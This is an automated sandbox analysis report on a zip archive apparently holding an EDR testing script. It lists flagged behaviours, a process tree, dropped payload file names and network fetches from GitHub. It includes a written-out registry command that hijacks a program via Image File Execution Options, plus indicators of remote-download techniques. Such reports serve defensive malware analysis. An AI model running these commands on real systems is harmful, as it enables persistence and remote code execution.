File name:

EDR-Testing-Script-master.zip

Full analysis: https://app.any.run/tasks/3dbe3245-dc17-41a9-a701-d91fb16f5639
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: April 27, 2020, 21:56:35
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract
MD5:

F03CCDA7B91E985A10E2076D24E958E1

SHA1:

1E0C535824DFB0FDD8712451CC820C91ACA9C2C1

SHA256:

6BAA8B6173EBD62E3048C6247D5ABCCB23C76C84905C0FB94EB02B69F0B32B0A

SSDEEP:

12288:yrI4yJgeS2j/u6z2gpMP8Wf1RoNt0hvBT5UrrCX/OM:yraJJjfzT6P8WPv7Ur+PX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Uses BITADMIN.EXE for downloading application

      • cmd.exe (PID: 2804)
      • cmd.exe (PID: 3944)

    • Executes PowerShell scripts

      • cmd.exe (PID: 4004)
      • cmd.exe (PID: 2496)

    • Loads dropped or rewritten executable

      • InstallUtil.exe (PID: 1252)
      • RegSvcs.exe (PID: 3800)
      • RegAsm.exe (PID: 3568)
      • RegAsm.exe (PID: 3436)
      • RegSvcs.exe (PID: 2400)
      • netsh.exe (PID: 3488)
      • rundll32.exe (PID: 1888)
      • rundll32.exe (PID: 2244)
      • svchost.exe (PID: 860)

    • Changes settings of System certificates

      • mshta.exe (PID: 3996)
      • svchost.exe (PID: 860)

    • Uses WMIC.EXE to invoke remote XSL script

      • cmd.exe (PID: 3608)

    • Application was injected by another process

      • SearchProtocolHost.exe (PID: 1848)
      • qemu-ga.exe (PID: 1428)
      • svchost.exe (PID: 824)
      • SearchFilterHost.exe (PID: 4088)
      • SearchIndexer.exe (PID: 1120)
      • ctfmon.exe (PID: 652)
      • winlogon.exe (PID: 428)
      • OSPPSVC.EXE (PID: 3696)
      • dwm.exe (PID: 2044)
      • svchost.exe (PID: 1052)
      • svchost.exe (PID: 1804)
      • explorer.exe (PID: 372)
      • taskeng.exe (PID: 1984)
      • spoolsv.exe (PID: 1188)
      • svchost.exe (PID: 2196)
      • wmiprvse.exe (PID: 404)
      • svchost.exe (PID: 1216)
      • svchost.exe (PID: 860)
      • svchost.exe (PID: 756)
      • svchost.exe (PID: 668)
      • svchost.exe (PID: 796)
      • svchost.exe (PID: 592)
      • services.exe (PID: 472)
      • wininit.exe (PID: 380)
      • lsm.exe (PID: 492)
      • IMEDICTUPDATE.EXE (PID: 1364)
      • lsass.exe (PID: 484)

    • Runs injected code in another process

      • netsh.exe (PID: 2720)

    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3992)
      • cmd.exe (PID: 620)

    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 2072)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3044)

    • Starts NET.EXE to view/change users group

      • cmd.exe (PID: 3180)
      • cmd.exe (PID: 3092)

    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 3092)

    • Starts NET.EXE to view/change login properties

      • cmd.exe (PID: 3092)

    • Uses Microsoft Installer as loader

      • cmd.exe (PID: 3560)
      • cmd.exe (PID: 984)

    • Changes Image File Execution Options

      • reg.exe (PID: 696)

    • Starts Visual C# compiler

      • cmd.exe (PID: 2848)
      • cmd.exe (PID: 2532)

    • Changes the autorun value in the registry

      • rundll32.exe (PID: 772)

    • Actions looks like stealing of personal data

      • explorer.exe (PID: 372)

    • Runs app for hidden code execution

      • cmd.exe (PID: 5652)

  • SUSPICIOUS

    • Creates files in the user directory

      • explorer.exe (PID: 372)
      • powershell.exe (PID: 940)
      • powershell.exe (PID: 3196)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3092)
      • explorer.exe (PID: 372)
      • MSBuild.exe (PID: 4060)
      • cmd.exe (PID: 5652)

    • Starts CertUtil for decode files

      • cmd.exe (PID: 1516)
      • cmd.exe (PID: 3312)

    • Creates files in the Windows directory

      • cmd.exe (PID: 3092)
      • certutil.exe (PID: 2184)
      • svchost.exe (PID: 860)
      • msdtc.exe (PID: 4032)
      • netsh.exe (PID: 2720)
      • certutil.exe (PID: 2900)
      • svchost.exe (PID: 756)
      • certutil.exe (PID: 3020)
      • certutil.exe (PID: 3076)

    • Removes files from Windows directory

      • certutil.exe (PID: 2184)
      • certutil.exe (PID: 2900)
      • certutil.exe (PID: 3020)
      • certutil.exe (PID: 3076)

    • Executable content was dropped or overwritten

      • certutil.exe (PID: 2184)
      • cmd.exe (PID: 3092)

    • Creates or modifies windows services

      • services.exe (PID: 472)

    • Starts MSHTA.EXE for opening HTA or HTMLS files

      • cmd.exe (PID: 1900)

    • Reads Internet Cache Settings

      • mshta.exe (PID: 3996)
      • regsvr32.exe (PID: 3980)
      • WMIC.exe (PID: 3772)
      • rundll32.exe (PID: 2344)
      • rundll32.exe (PID: 3212)
      • certutil.exe (PID: 2900)
      • cscript.exe (PID: 1604)
      • certutil.exe (PID: 3020)
      • hh.exe (PID: 4088)

    • Application launched itself

      • cmd.exe (PID: 3092)
      • cmd.exe (PID: 5652)

    • Executed as Windows Service

      • msdtc.exe (PID: 4032)

    • Adds / modifies Windows certificates

      • mshta.exe (PID: 3996)
      • svchost.exe (PID: 860)

    • Uses NETSH.EXE for network configuration

      • cmd.exe (PID: 2348)
      • cmd.exe (PID: 2740)
      • cmd.exe (PID: 2808)
      • cmd.exe (PID: 3192)
      • cmd.exe (PID: 3568)
      • cmd.exe (PID: 3436)

    • Uses RUNDLL32.EXE to load library

      • cmd.exe (PID: 3760)
      • cmd.exe (PID: 3060)
      • cmd.exe (PID: 528)
      • cmd.exe (PID: 3840)
      • cmd.exe (PID: 3304)
      • cmd.exe (PID: 580)
      • control.exe (PID: 3932)

    • Reads internet explorer settings

      • rundll32.exe (PID: 3212)
      • rundll32.exe (PID: 2344)
      • hh.exe (PID: 4088)

    • Executes scripts

      • cmd.exe (PID: 780)
      • cmd.exe (PID: 3264)
      • cmd.exe (PID: 3128)
      • cmd.exe (PID: 3864)

    • Uses WMIC.EXE to obtain a system information

      • cmd.exe (PID: 3092)

    • Uses WHOAMI.EXE to obtaining logged on user information

      • cmd.exe (PID: 2764)
      • cmd.exe (PID: 3200)

    • Uses IPCONFIG.EXE to discover IP address

      • cmd.exe (PID: 3092)

    • Uses NETSTAT.EXE to discover network connections

      • cmd.exe (PID: 3092)

    • Starts SC.EXE for service management

      • cmd.exe (PID: 3092)
      • cmd.exe (PID: 2388)
      • cmd.exe (PID: 1848)

    • Uses TASKLIST.EXE to query information about running processes

      • cmd.exe (PID: 3092)

    • Uses SYSTEMINFO.EXE to read environment

      • cmd.exe (PID: 3092)

    • Uses REG.EXE to modify Windows registry

      • cmd.exe (PID: 3092)
      • cmd.exe (PID: 316)
      • cmd.exe (PID: 1908)
      • cmd.exe (PID: 3968)
      • cmd.exe (PID: 3424)
      • cmd.exe (PID: 5604)

    • Starts Internet Explorer

      • PresentationHost.exe (PID: 5916)

  • INFO

    • Manual execution by user

      • cmd.exe (PID: 3092)

    • Reads internet explorer settings

      • mshta.exe (PID: 3996)

    • Reads settings of System Certificates

      • powershell.exe (PID: 3196)
      • svchost.exe (PID: 860)

    • Application launched itself

      • IEXPLORE.EXE (PID: 6028)

    • Reads Internet Cache Settings

      • IEXPLORE.EXE (PID: 4484)
      • IEXPLORE.EXE (PID: 6028)

    • Changes internet zones settings

      • IEXPLORE.EXE (PID: 6028)

    • Modifies the phishing filter of IE

      • IEXPLORE.EXE (PID: 6028)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2019:08:16 07:07:21
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: EDR-Testing-Script-master/
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
389
Monitored processes
285
Malicious processes
15
Suspicious processes
16

Behavior graph

Click at the process to see the details
start inject inject winrar.exe no specs cmd.exe cmd.exe no specs timeout.exe no specs certutil.exe cmd.exe no specs cmd.exe no specs timeout.exe no specs bitsadmin.exe no specs powershell.exe no specs timeout.exe no specs cmd.exe no specs installutil.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs mshta.exe calc.exe no specs cmd.exe no specs timeout.exe no specs powershell.exe calc.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs regsvcs.exe no specs regsvcs.exe no specs msdtc.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs regasm.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs regasm.exe no specs cmd.exe no specs timeout.exe no specs regsvr32.exe calc.exe no specs cmd.exe no specs timeout.exe no specs msbuild.exe no specs cmd.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs wmic.exe calc.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs netsh.exe no specs calc.exe no specs calc.exe no specs explorer.exe wininit.exe wmiprvse.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe ctfmon.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe searchindexer.exe spoolsv.exe svchost.exe imedictupdate.exe qemu-ga.exe svchost.exe searchprotocolhost.exe taskeng.exe dwm.exe svchost.exe osppsvc.exe searchfilterhost.exe timeout.exe no specs cmd.exe no specs rundll32.exe no specs calc.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs rundll32.exe calc.exe no specs cmd.exe no specs timeout.exe no specs rundll32.exe no specs cmd.exe no specs timeout.exe no specs certutil.exe cmd.exe no specs timeout.exe no specs cmstp.exe no specs cmd.exe no specs timeout.exe no specs forfiles.exe no specs calc.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs cscript.exe no specs cscript.exe no specs calc.exe no specs cmd.exe timeout.exe no specs schtasks.exe no specs cmd.exe no specs timeout.exe no specs cscript.exe calc.exe no specs timeout.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe no specs cmd.exe no specs cmd.exe no specs hostname.exe no specs ipconfig.exe no specs whoami.exe no specs net.exe no specs whoami.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs netstat.exe no specs tasklist.exe no specs sc.exe no specs systeminfo.exe no specs reg.exe no specs timeout.exe no specs timeout.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs reg.exe reg.exe no specs reg.exe no specs reg.exe no specs cmd.exe no specs timeout.exe no specs certutil.exe timeout.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs certutil.exe no specs sdbinst.exe no specs cmd.exe no specs timeout.exe no specs sdbinst.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs bitsadmin.exe no specs sdbinst.exe no specs cmd.exe no specs timeout.exe no specs sdbinst.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs msiexec.exe no specs msiexec.exe msiexec.exe cmd.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs esentutl.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs replace.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs hh.exe timeout.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs rundll32.exe runonce.exe no specs grpconv.exe no specs cmd.exe no specs timeout.exe no specs rundll32.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs csc.exe no specs csc.exe no specs cmd.exe no specs timeout.exe no specs rundll32.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs sc.exe no specs sc.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs timeout.exe no specs cmd.exe no specs control.exe no specs rundll32.exe no specs calc.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs cscript.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs cmd.exe no specs timeout.exe no specs presentationhost.exe no specs iexplore.exe no specs iexplore.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs reg.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs calc.exe no specs cmd.exe no specs timeout.exe no specs calc.exe no specs cmd.exe no specs cmd.exe no specs timeout.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
256cscript //nologo "C:\Windows\System32\winrm.vbs" qc -qC:\Windows\system32\cscript.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Console Based Script Host
Exit code:
1
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\cscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
304timeout 5C:\Windows\system32\timeout.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
timeout - pauses command processing
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\timeout.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ws2_32.dll
316cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /v Debugger /d "C:\windows\system32\calc.exe"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
332cmd /c esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d adrestore.exe /o C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
4294967295
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
340"C:\Windows\system32\runonce.exe" -rC:\Windows\system32\runonce.exerundll32.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Run Once Wrapper
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\runonce.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
372C:\Windows\Explorer.EXEC:\Windows\explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\winanr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
380wininit.exeC:\Windows\System32\wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Start-Up Application
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wininit.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
404C:\Windows\system32\wbem\wmiprvse.exe -secured -EmbeddingC:\Windows\system32\wbem\wmiprvse.exe
svchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Provider Host
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\wbem\wmiprvse.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
428winlogon.exeC:\Windows\System32\winlogon.exe
explorer.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Logon Application
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\winlogon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winsta.dll
472C:\Windows\system32\services.exeC:\Windows\System32\services.exe
wininit.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Services and Controller app
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\services.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\cryptbase.dll
Total events
8 071
Read events
5 703
Write events
2 366
Delete events
2

Modification events

(PID) Process:(3716) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3716) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3716) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(372) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
Operation:writeName:a
Value:
WinRAR.exe
(PID) Process:(372) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithList
Operation:writeName:MRUList
Value:
a
(PID) Process:(372) explorer.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.zip\OpenWithProgids
Operation:writeName:WinRAR.ZIP
Value:
(PID) Process:(372) explorer.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\12B\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3716) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\EDR-Testing-Script-master.zip
(PID) Process:(3716) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3716) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
Executable files
2
Suspicious files
43
Text files
120
Unknown types
27

Dropped files

PID
Process
Filename
Type
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Cobalt\EDR-TEST.CNA
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\LICENSE
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\Cmstp.inf
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\Cmstp_calc.sct
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\CradleTest.txt
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\Mshta_calc.sct
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\Wmic_calc.xsl
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\calc-exec.sdb
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\calc.inf
MD5:
SHA256:
3716WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3716.44359\EDR-Testing-Script-master\Payloads\notepad.msi
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
22
DNS requests
16
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4088
hh.exe
GET
301
151.101.0.133:80
http://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt
US
shared
1052
svchost.exe
GET
200
2.18.233.62:80
http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
unknown
der
813 b
whitelisted
3996
mshta.exe
GET
200
93.184.220.29:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEATh56TcXPLzbcArQrhdFZ8%3D
US
der
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
3996
mshta.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
3996
mshta.exe
93.184.220.29:80
ocsp.digicert.com
MCI Communications Services, Inc. d/b/a Verizon Business
US
whitelisted
3196
powershell.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
3980
regsvr32.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
3772
WMIC.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
1604
cscript.exe
151.101.0.133:443
raw.githubusercontent.com
Fastly
US
malicious
2600
msiexec.exe
140.82.118.3:443
github.com
US
malicious
4
System
51.11.30.100:445
live.sysinternals.com
Microsoft Corporation
GB
suspicious
3360
msiexec.exe
140.82.118.3:443
github.com
US
malicious

DNS requests

Domain
IP
Reputation
raw.githubusercontent.com
  • 151.101.0.133
  • 151.101.64.133
  • 151.101.128.133
  • 151.101.192.133
shared
ocsp.digicert.com
  • 93.184.220.29
whitelisted
www.microsoft.com
  • 2.18.233.62
whitelisted
github.com
  • 140.82.118.3
malicious
live.sysinternals.com
  • 51.11.30.100
suspicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET INFO TLS Handshake Failure
Potentially Bad Traffic
ET INFO TLS Handshake Failure
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
EDR-Testing-Script-master.zip